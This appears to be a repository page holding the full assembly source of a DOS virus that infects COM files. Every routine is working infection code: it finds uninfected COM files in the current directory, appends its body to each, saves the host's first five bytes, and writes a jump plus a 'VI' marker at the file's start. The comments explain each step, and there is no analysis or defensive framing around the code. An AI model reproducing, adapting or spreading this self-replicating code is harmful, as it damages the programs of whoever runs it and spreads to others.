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210 lines
11 KiB
NASM
210 lines
11 KiB
NASM
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;This program is a basic virus that infects just COM files. It gets the first
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;five bytes of its host and stores them elsewhere in the program and puts a
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;jump to it at the start, along with the letters "VI", which are used to
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;by the virus to identify an already infected program.
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MAIN SEGMENT BYTE
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ASSUME CS:MAIN,DS:MAIN,SS:NOTHING
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ORG 100H
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;This is a shell of a program which will release the virus into the system.
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;All it does is jump to the virus routine, which does its job and returns to
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;it, at which point it terminates to DOS.
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HOST:
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jmp NEAR PTR VIRUS_START ;Note: MASM is too stupid to assemble this correctly
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db 'VI'
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mov ah,4CH
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mov al,0
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int 21H ;terminate normally with DOS
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VIRUS: ;this is a label for the first byte of the virus
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COMFILE DB '*.COM',0 ;search string for a com file
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VIRUS_START:
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call GET_START ;get start address - this is a trick to determine the location of the start of this program
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GET_START: ;put the address of GET_START on the stack with the call,
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sub WORD PTR [VIR_START],OFFSET GET_START - OFFSET VIRUS ;which is overlayed by VIR_START. Subtract offsets to get @VIRUS
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mov dx,OFFSET DTA ;put DTA at the end of the virus for now
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mov ah,1AH ;set new DTA function
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int 21H
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call FIND_FILE ;get a com file to attack
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jnz EXIT_VIRUS ;returned nz - no file to infect, exit
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call INFECT ;have a good COM file to use - infect it
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mov dx,OFFSET FNAME ;display the name of the file just infected
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mov WORD PTR [HANDLE],24H ;make sure the string terminates, put '$' after it
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mov ah,9
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int 21H ;display it
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EXIT_VIRUS:
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mov dx,80H ;fix the DTA so that the host program doesn't
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mov ah,1AH ;get confused and write over its data with
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int 21H ;file i/o or something like that!
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mov bx,[VIR_START] ;get the start address of the virus
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mov ax,WORD PTR [bx+(OFFSET START_CODE)-(OFFSET VIRUS)] ;restore the 5 original bytes
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mov WORD PTR [HOST],ax ;of the COM file to their
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mov ax,WORD PTR [bx+(OFFSET START_CODE)-(OFFSET VIRUS)+2] ;to the start of the file
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mov WORD PTR [HOST+2],ax
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mov al,BYTE PTR [bx+(OFFSET START_CODE)-(OFFSET VIRUS)+4] ;to the start of the file
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mov BYTE PTR [HOST+4],al
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mov [VIR_START],100H ;set up stack to do return to host program
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ret ;and return to host
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START_CODE: ;move first 5 bytes from host program to here
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nop ;nop's for the original assembly code
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nop ;will work fine
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nop
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nop
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nop
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;--------------------------------------------------------------------------
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;Find a file which passes FILE_OK
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;
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;This routine does a simple directory search to find a COM file in the
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;current directory, to find a file for which FILE_OK returns with C reset.
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;
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FIND_FILE:
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mov dx,[VIR_START]
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; add dx,OFFSET COMFILE - OFFSET VIRUS ;this is zero here, so omit it
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mov cx,3FH ;search for any file, no matter what the attributes
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mov ah,4EH ;do DOS search first function
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int 21H
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FF_LOOP:
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or al,al ;is DOS return OK?
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jnz FF_DONE ;no - quit with Z reset
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call FILE_OK ;return ok - is this a good file to use?
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jz FF_DONE ;yes - valid file found - exit with z set
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mov ah,4FH ;not a valid file, so
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int 21H ;do find next function
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jmp FF_LOOP ;and go test next file for validity
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FF_DONE:
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ret
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;--------------------------------------------------------------------------
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;Function to determine whether the COM file specified in FNAME is useable.
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;if so return z, else return nz.
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;What makes a COM file useable?:
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; a) There must be space for the virus without exceeding the
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; 64 KByte file size limit.
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; b) Bytes 0, 3 and 4 of the file are not a near jump op code,
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; and 'V', 'I', respectively
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;
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FILE_OK:
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mov dx,OFFSET FNAME ;first open the file
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mov ax,3D02H ;r/w access open file, since we'll want to write to it
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int 21H
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jc FOK_NZEND ;error opening file - quit and say this file can't be used
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mov bx,ax ;put file handle in bx
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push bx ;and save it on the stack
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mov cx,5 ;next read 5 bytes at the start of the program
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mov dx,OFFSET START_IMAGE ;and store them here
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mov ah,3FH ;DOS read function
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int 21H
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pop bx ;restore the file handle
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mov ah,3EH
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int 21H ;and close the file
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mov ax,WORD PTR [FSIZE] ;get the file size of the host
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add ax,OFFSET ENDVIRUS - OFFSET VIRUS ;and add the size of the virus to it
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jc FOK_NZEND ;c set if ax overflows, which will happen if size goes above 64K
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cmp BYTE PTR [START_IMAGE],0E9H ;size ok - is first byte a near jump op code?
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jnz FOK_ZEND ;not a near jump, file must be ok, exit with z set
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cmp WORD PTR [START_IMAGE+3],4956H ;ok, is 'VI' in positions 3 & 4?
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jnz FOK_ZEND ;no, file can be infected, return with Z set
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FOK_NZEND:
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mov al,1 ;we'd better not infect this file
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or al,al ;so return with z reset
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ret
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FOK_ZEND:
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xor al,al ;ok to infect, return with z set
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ret
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;--------------------------------------------------------------------------
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;This routine moves the virus (this program) to the end of the COM file
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;Basically, it just copies everything here to there, and then goes and
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;adjusts the 5 bytes at the start of the program and the five bytes stored
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;in memory.
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;
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INFECT:
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mov dx,OFFSET FNAME ;first open the file
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mov ax,3D02H ;r/w access open file, since we'll want to write to it
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int 21H
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mov WORD PTR [HANDLE],ax ;and save the file handle here
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xor cx,cx ;prepare to write virus on new file; positon file pointer
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mov dx,cx ;cx:dx pointer = 0
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mov bx,WORD PTR [HANDLE]
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mov ax,4202H ;locate pointer to end DOS function
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int 21H
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mov cx,OFFSET FINAL - OFFSET VIRUS ;now write the virus; cx=number of bytes to write
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mov dx,[VIR_START] ;ds:dx = place in memory to write from
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mov bx,WORD PTR [HANDLE] ;bx = file handle
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mov ah,40H ;DOS write function
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int 21H
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xor cx,cx ;now we have to go save the 5 bytes which came from the start of the
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mov dx,WORD PTR [FSIZE] ;so position the file pointer
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add dx,OFFSET START_CODE - OFFSET VIRUS ;to where START_CODE is in the new virus
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mov bx,WORD PTR [HANDLE]
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mov ax,4200H ;and use DOS to position the file pointer
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int 21H
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mov cx,5 ;now go write START_CODE in the file
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mov bx,WORD PTR [HANDLE] ;get file handle
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mov dx,OFFSET START_IMAGE ;during the FILE_OK function above
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mov ah,40H
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int 21H
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xor cx,cx ;now go back to the start of host program
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mov dx,cx ;so we can put the jump to the virus in
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mov bx,WORD PTR [HANDLE]
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mov ax,4200H ;locate file pointer function
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int 21H
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mov bx,[VIR_START] ;calculate jump location for start of code
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mov BYTE PTR [START_IMAGE],0E9H ;first the near jump op code E9
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mov ax,WORD PTR [FSIZE] ;and then the relative address
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add ax,OFFSET VIRUS_START-OFFSET VIRUS-3 ;these go in the START_IMAGE area
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mov WORD PTR [START_IMAGE+1],ax
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mov WORD PTR [START_IMAGE+3],4956H ;and put 'VI' ID code in
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mov cx,5 ;ok, now go write the 5 bytes we just put in START_IMAGE
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mov dx,OFFSET START_IMAGE ;ds:dx = pointer to START_IMAGE
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mov bx,WORD PTR [HANDLE] ;file handle
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mov ah,40H ;DOS write function
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int 21H
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mov bx,WORD PTR [HANDLE] ;finally, get handle off of stack
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mov ah,3EH ;and close file
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int 21H
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ret ;all done, the virus is transferred
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FINAL: ;label for last byte of code to be kept in virus when it moves
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ENDVIRUS EQU $ + 212 ;label for determining space needed by virus
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;Note: 212 = FFFF - FF2A - 1 = size of data space
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; $ gives approximate size of code required for virus
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ORG 0FF2AH
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DTA DB 1AH dup (?) ;this is a work area for the search function
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FSIZE DW 0,0 ;file size storage area
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FNAME DB 13 dup (?) ;area for file path
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HANDLE DW 0 ;file handle
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START_IMAGE DB 0,0,0,0,0 ;an area to store 3 bytes for reading and writing to file
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VSTACK DW 50H dup (?) ;stack for the virus program
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VIR_START DW (?) ;start address of VIRUS (overlays the stack)
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MAIN ENDS
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END HOST
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